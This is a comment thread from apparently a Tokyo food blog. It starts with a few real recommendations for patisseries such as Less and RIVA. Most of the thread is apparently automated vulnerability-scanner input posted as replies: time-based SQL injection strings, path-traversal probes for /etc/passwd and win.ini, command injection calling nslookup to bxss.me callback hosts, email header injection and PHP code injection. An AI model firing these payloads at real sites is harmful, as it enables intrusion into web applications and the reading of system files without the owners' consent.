Just saw this. "Less" near Ebisu Garden Place https://tabelog.com/tokyo/A1303/A130302/13239458/. The cakes are tiny and expensive and there isn't much choice but it's one of the very best and it's never busy and conveniently located.
I'm not really a dessert person so take my recommendation with a grain of salt. Ungrain in Minamiaoyama, I went once and its a nice little shop, need to book a session before you visit. Think they have different offerings with seasonal ingredients.
I can second RIVA (the patisserie affiliated with LESS). Yuji Ajiki also makes a fantastic roll cake and fromage cru petit gateaux, but is located in the middle of nowhere :p.
Found A Tes Souhaits overrated, despite its high Tabelog score. Same goes for Asako Iwayanagi (the parfaits are nice but not ¥6000 nice).
4 Comments
Just saw this. "Less" near Ebisu Garden Place https://tabelog.com/tokyo/A1303/A130302/13239458/. The cakes are tiny and expensive and there isn't much choice but it's one of the very best and it's never busy and conveniently located.
re: thetokyogourmet
x2vDjdkk
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+842-842-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+842-842-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
RjWiDvLp'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 698=(SELECT 698 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 864=(SELECT 864 FROM PG_SLEEP(15))--
re: thetokyogourmet
ag5WOuTV' OR 412=(SELECT 412 FROM PG_SLEEP(15))--
re: thetokyogourmet
FyOT3zwq') OR 406=(SELECT 406 FROM PG_SLEEP(15))--
re: thetokyogourmet
Zh4emVbb')) OR 808=(SELECT 808 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@JbxhA
re: thetokyogourmet
1CakGBb7EEO
re: thetokyogourmet
%0abcc:074625.67-19886.67.f6e4e.19990.2@bxss.me
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-19887.67.f6e4e.19990.2@bxss.me
re: thetokyogourmet
response.write(9084454*9592714)
re: thetokyogourmet
'+response.write(9084454*9592714)+'
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
"+response.write(9084454*9592714)+"
re: thetokyogourmet
${10000438+9999060}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
'.gethostbyname(lc('hitrp'.'trtxvjsvfcf33.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(82).chr(115).chr(79).'
re: thetokyogourmet
)
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
".gethostbyname(lc("hitmu"."szurpjqqd87a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(72).chr(122).chr(83)."
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
echo sluqfb$()\ xozipx\nz^xyu||a #' &echo sluqfb$()\ xozipx\nz^xyu||a #|" &echo sluqfb$()\ xozipx\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
&echo edxodp$()\ nncwfb\nz^xyu||a #' &echo edxodp$()\ nncwfb\nz^xyu||a #|" &echo edxodp$()\ nncwfb\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
|echo kyllbj$()\ ohblae\nz^xyu||a #' |echo kyllbj$()\ ohblae\nz^xyu||a #|" |echo kyllbj$()\ ohblae\nz^xyu||a #
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
(nslookup hitpcytrcbara71448.bxss.me||perl -e "gethostbyname('hitpcytrcbara71448.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
$(nslookup hitrsxdzajstu395fb.bxss.me||perl -e "gethostbyname('hitrsxdzajstu395fb.bxss.me')")
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(97).concat(73).concat(107).concat(65)+(require"socket"
Socket.gethostbyname("hitqj"+"vfopnnff06ea6.bxss.me.")[3].to_s)+"
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
&nslookup hitvjcguidctzbf56b.bxss.me&'\"`0&nslookup hitvjcguidctzbf56b.bxss.me&`'
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(115).concat(71).concat(102).concat(84)+(require'socket'
Socket.gethostbyname('hitfn'+'jtziztzu16cc3.bxss.me.')[3].to_s)+'
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
&(nslookup hitoqfuhyifyvc3447.bxss.me||perl -e "gethostbyname('hitoqfuhyifyvc3447.bxss.me')")&'\"`0&(nslookup hitoqfuhyifyvc3447.bxss.me||perl -e "gethostbyname('hitoqfuhyifyvc3447.bxss.me')")&`'
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
|(nslookup hitjnythsgsqf56a3a.bxss.me||perl -e "gethostbyname('hitjnythsgsqf56a3a.bxss.me')")
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
`(nslookup hitfftqobifel26717.bxss.me||perl -e "gethostbyname('hitfftqobifel26717.bxss.me')")`
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
bxss.me
re: thetokyogourmet
;(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")|(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")&(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
'"
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
<!--
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+363-363-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+363-363-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+61-61-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+61-61-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+36-36-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+36-36-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+167-167-1=0+0+0+1 or 'HrpfSHQW'='
re: thetokyogourmet
-1' OR 3+167-167-1=0+0+0+1 or 'HrpfSHQW'='
re: thetokyogourmet
-1" OR 2+616-616-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+616-616-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
yrvHspQd'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 715=(SELECT 715 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 286=(SELECT 286 FROM PG_SLEEP(15))--
re: thetokyogourmet
vjhPXZqN' OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: thetokyogourmet
jOEZ1Zxr') OR 111=(SELECT 111 FROM PG_SLEEP(15))--
re: thetokyogourmet
QLmYkosF')) OR 852=(SELECT 852 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@I1kxT
@thetokyogourmet thanks! Will try it out.
re: Yee How
Npn5iNOK
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+957-957-1=0+0+0+1
re: Yee How
-1 OR 3+957-957-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
kDR3Fgj1'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 754=(SELECT 754 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 833=(SELECT 833 FROM PG_SLEEP(15))--
re: Yee How
fArTLp88' OR 361=(SELECT 361 FROM PG_SLEEP(15))--
re: Yee How
ghoVbpVc') OR 810=(SELECT 810 FROM PG_SLEEP(15))--
re: Yee How
H3vtdYNG')) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@fRqTL
re: Yee How
1DD35dkspYO
re: Yee How
response.write(9928279*9114299)
re: Yee How
'+response.write(9928279*9114299)+'
re: Yee How
%0abcc:074625.67-19840.67.ab8d3.19990.2@bxss.me
re: Yee How
"+response.write(9928279*9114299)+"
re: Yee How
to@example.com>%0d%0abcc:074625.67-19841.67.ab8d3.19990.2@bxss.me
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
${9999145+9999543}
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
echo yzfzgw$()\ ghmfuq\nz^xyu||a #' &echo yzfzgw$()\ ghmfuq\nz^xyu||a #|" &echo yzfzgw$()\ ghmfuq\nz^xyu||a #
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
&echo jkytyu$()\ ihfxej\nz^xyu||a #' &echo jkytyu$()\ ihfxej\nz^xyu||a #|" &echo jkytyu$()\ ihfxej\nz^xyu||a #
re: Yee How
)
re: Yee How
/etc/passwd
re: Yee How
|echo vfayjp$()\ htskyo\nz^xyu||a #' |echo vfayjp$()\ htskyo\nz^xyu||a #|" |echo vfayjp$()\ htskyo\nz^xyu||a #
re: Yee How
!(()&&!|*|*|
re: Yee How
%2fetc%2fpasswd
re: Yee How
(nslookup hitskapklhyrre57e7.bxss.me||perl -e "gethostbyname('hitskapklhyrre57e7.bxss.me')")
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
^(#$!@#$)(()))******
re: Yee How
$(nslookup hitzykhxxiynq734fe.bxss.me||perl -e "gethostbyname('hitzykhxxiynq734fe.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
&nslookup hithofeptccet694e7.bxss.me&'\"`0&nslookup hithofeptccet694e7.bxss.me&`'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&(nslookup hitlztqelahsua9235.bxss.me||perl -e "gethostbyname('hitlztqelahsua9235.bxss.me')")&'\"`0&(nslookup hitlztqelahsua9235.bxss.me||perl -e "gethostbyname('hitlztqelahsua9235.bxss.me')")&`'
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
|(nslookup hitcuxyorexyqd823c.bxss.me||perl -e "gethostbyname('hitcuxyorexyqd823c.bxss.me')")
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
`(nslookup hitxdwebyjrdq73be6.bxss.me||perl -e "gethostbyname('hitxdwebyjrdq73be6.bxss.me')")`
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
'.gethostbyname(lc('hitqx'.'eqknnyvz2afc0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(66).chr(99).chr(69).'
re: Yee How
;(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")|(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")&(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
file:///etc/passwd
re: Yee How
